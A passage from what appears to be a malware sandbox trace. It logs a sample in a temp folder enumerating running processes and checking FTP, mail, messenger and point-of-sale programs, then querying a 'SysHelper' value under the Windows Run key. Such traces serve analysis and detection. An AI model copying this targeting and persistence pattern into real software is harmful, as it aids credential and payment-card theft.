out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.235] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1190000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="quarterlyclone.exe") returned 0x12 [0165.236] CloseHandle (hObject=0x5a4) returned 1 [0165.236] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x304) returned 0x5a4 [0165.236] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.237] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x9d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="remained-hostels-irish.exe") returned 0x1a [0165.238] CloseHandle (hObject=0x5a4) returned 1 [0165.238] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x5a4 [0165.238] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.239] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1040000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="providing-icon.exe") returned 0x12 [0165.239] CloseHandle (hObject=0x5a4) returned 1 [0165.239] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x5a4 [0165.240] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.241] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x30000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="findlaw_northeast_generally.exe") returned 0x1f [0165.241] CloseHandle (hObject=0x5a4) returned 1 [0165.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ec) returned 0x5a4 [0165.241] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.243] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x230000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="rise_waiver.exe") returned 0xf [0165.243] CloseHandle (hObject=0x5a4) returned 1 [0165.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7dc) returned 0x5a4 [0165.243] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.245] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1370000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0165.245] CloseHandle (hObject=0x5a4) returned 1 [0165.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5c4) returned 0x5a4 [0165.245] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.247] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0165.247] CloseHandle (hObject=0x5a4) returned 1 [0165.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5b8) returned 0x5a4 [0165.248] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.249] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0165.249] CloseHandle (hObject=0x5a4) returned 1 [0165.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x5a4 [0165.250] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.251] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xdf0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0165.251] CloseHandle (hObject=0x5a4) returned 1 [0165.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5a4 [0165.252] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.253] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8e0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0165.253] CloseHandle (hObject=0x5a4) returned 1 [0165.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x5a4 [0165.254] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.255] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb80000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0165.255] CloseHandle (hObject=0x5a4) returned 1 [0165.256] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x124) returned 0x5a4 [0165.256] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.257] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1e0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0165.258] CloseHandle (hObject=0x5a4) returned 1 [0165.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x40c) returned 0x5a4 [0165.258] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.259] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa70000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0165.259] CloseHandle (hObject=0x5a4) returned 1 [0165.260] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc4) returned 0x5a4 [0165.260] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.261] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd90000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0165.261] CloseHandle (hObject=0x5a4) returned 1 [0165.262] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x53c) returned 0x5a4 [0165.262] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.263] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0165.263] CloseHandle (hObject=0x5a4) returned 1 [0165.264] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x5a4 [0165.264] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.265] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x800000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0165.265] CloseHandle (hObject=0x5a4) returned 1 [0165.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x5a4 [0165.266] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.267] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc00000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0165.267] CloseHandle (hObject=0x5a4) returned 1 [0165.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0165.268] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.269] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc20000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0165.269] CloseHandle (hObject=0x5a4) returned 1 [0165.269] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d4) returned 0x5a4 [0165.270] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.271] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1080000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0165.271] CloseHandle (hObject=0x5a4) returned 1 [0165.271] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x5a4 [0165.271] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.273] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb00000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0165.273] CloseHandle (hObject=0x5a4) returned 1 [0165.273] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x31c) returned 0x5a4 [0165.273] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.275] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11c0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0165.275] CloseHandle (hObject=0x5a4) returned 1 [0165.275] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f4) returned 0x5a4 [0165.275] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.277] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa40000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0165.277] CloseHandle (hObject=0x5a4) returned 1 [0165.277] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d4) returned 0x5a4 [0165.277] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.279] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb20000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0165.279] CloseHandle (hObject=0x5a4) returned 1 [0165.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x810) returned 0x5a4 [0165.279] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.281] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xca0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0165.281] CloseHandle (hObject=0x5a4) returned 1 [0165.281] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x5a4 [0165.281] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.283] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb00000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0165.283] CloseHandle (hObject=0x5a4) returned 1 [0165.283] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x5a4 [0165.283] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.285] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0165.285] CloseHandle (hObject=0x5a4) returned 1 [0165.285] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x840) returned 0x5a4 [0165.285] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.287] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x50000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0165.287] CloseHandle (hObject=0x5a4) returned 1 [0165.287] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x850) returned 0x5a4 [0165.287] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.289] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1280000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0165.289] CloseHandle (hObject=0x5a4) returned 1 [0165.289] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x5a4 [0165.289] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.291] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xff0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0165.291] CloseHandle (hObject=0x5a4) returned 1 [0165.291] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x870) returned 0x5a4 [0165.291] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.293] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0165.293] CloseHandle (hObject=0x5a4) returned 1 [0165.293] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x880) returned 0x5a4 [0165.293] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.295] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1180000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0165.295] CloseHandle (hObject=0x5a4) returned 1 [0165.295] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x890) returned 0x5a4 [0165.295] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.297] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x870000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0165.297] CloseHandle (hObject=0x5a4) returned 1 [0165.297] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a0) returned 0x5a4 [0165.298] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.299] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xcf0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0165.299] CloseHandle (hObject=0x5a4) returned 1 [0165.300] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b0) returned 0x5a4 [0165.300] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.301] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0165.301] CloseHandle (hObject=0x5a4) returned 1 [0165.301] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c0) returned 0x5a4 [0165.302] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.303] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0165.303] CloseHandle (hObject=0x5a4) returned 1 [0165.303] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x5a4 [0165.304] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.305] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd90000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0165.305] CloseHandle (hObject=0x5a4) returned 1 [0165.305] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e0) returned 0x5a4 [0165.305] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.307] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe70000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0165.307] CloseHandle (hObject=0x5a4) returned 1 [0165.307] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f0) returned 0x5a4 [0165.307] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.309] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x870000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0165.310] CloseHandle (hObject=0x5a4) returned 1 [0165.310] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x900) returned 0x5a4 [0165.310] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.311] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x3d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0165.312] CloseHandle (hObject=0x5a4) returned 1 [0165.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x5a4 [0165.312] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.313] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe90000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0165.314] CloseHandle (hObject=0x5a4) returned 1 [0165.314] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x5a4 [0165.314] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.315] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf80000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0165.315] CloseHandle (hObject=0x5a4) returned 1 [0165.316] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x5a4 [0165.316] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.317] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0165.317] CloseHandle (hObject=0x5a4) returned 1 [0165.317] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x5a4 [0165.318] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.319] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1370000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0165.319] CloseHandle (hObject=0x5a4) returned 1 [0165.319] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x950) returned 0x5a4 [0165.320] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.321] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11a0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0165.321] CloseHandle (hObject=0x5a4) returned 1 [0165.322] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x960) returned 0x5a4 [0165.322] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.323] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x40000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0165.324] CloseHandle (hObject=0x5a4) returned 1 [0165.324] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x5a4 [0165.324] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.325] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x3d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0165.326] CloseHandle (hObject=0x5a4) returned 1 [0165.326] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x5a4 [0165.326] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.328] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11c0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0165.328] CloseHandle (hObject=0x5a4) returned 1 [0165.328] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x5a4 [0165.328] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.329] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1f0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0165.330] CloseHandle (hObject=0x5a4) returned 1 [0165.330] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x5a4 [0165.330] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.331] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x940000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0165.332] CloseHandle (hObject=0x5a4) returned 1 [0165.332] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x5a4 [0165.332] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.333] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8d0000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="monthly-appearing.exe") returned 0x15 [0165.334] CloseHandle (hObject=0x5a4) returned 1 [0165.334] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x0 [0165.334] CloseHandle (hObject=0x0) returned 0 [0165.334] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa08) returned 0x0 [0165.334] CloseHandle (hObject=0x0) returned 0 [0165.334] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb38) returned 0x0 [0165.334] CloseHandle (hObject=0x0) returned 0 [0165.334] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0165.334] CloseHandle (hObject=0x0) returned 0 [0165.335] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x67c) returned 0x0 [0165.335] CloseHandle (hObject=0x0) returned 0 [0165.335] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0165.335] CloseHandle (hObject=0x0) returned 0 [0165.335] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xabc) returned 0x5a4 [0165.335] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d574, cb=0x4, lpcbNeeded=0x18d558 | out: lphModule=0x18d574, lpcbNeeded=0x18d558) returned 1 [0165.336] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x400000, lpBaseName=0x18cd58, nSize=0x400 | out: lpBaseName="CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned 0x46 [0165.337] CloseHandle (hObject=0x5a4) returned 1 [0165.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x289fb0 [0165.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x319cd18 [0165.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31963f8 [0165.346] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31b2308 [0165.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31b2570 [0165.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31b27d8 [0165.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31b2a40 [0165.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31b2ca8 [0165.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31b2f10 [0165.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31b3178 [0165.347] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31b33e0 [0165.356] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d558 | out: phkResult=0x18d558*=0x5a4) returned 0x0 [0165.357] RegQueryValueExW (in: hKey=0x5a4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d554, lpData=0x18bc80, lpcbData=0x18d538*=0x400 | out: lpType=0x18d554*=0x2, 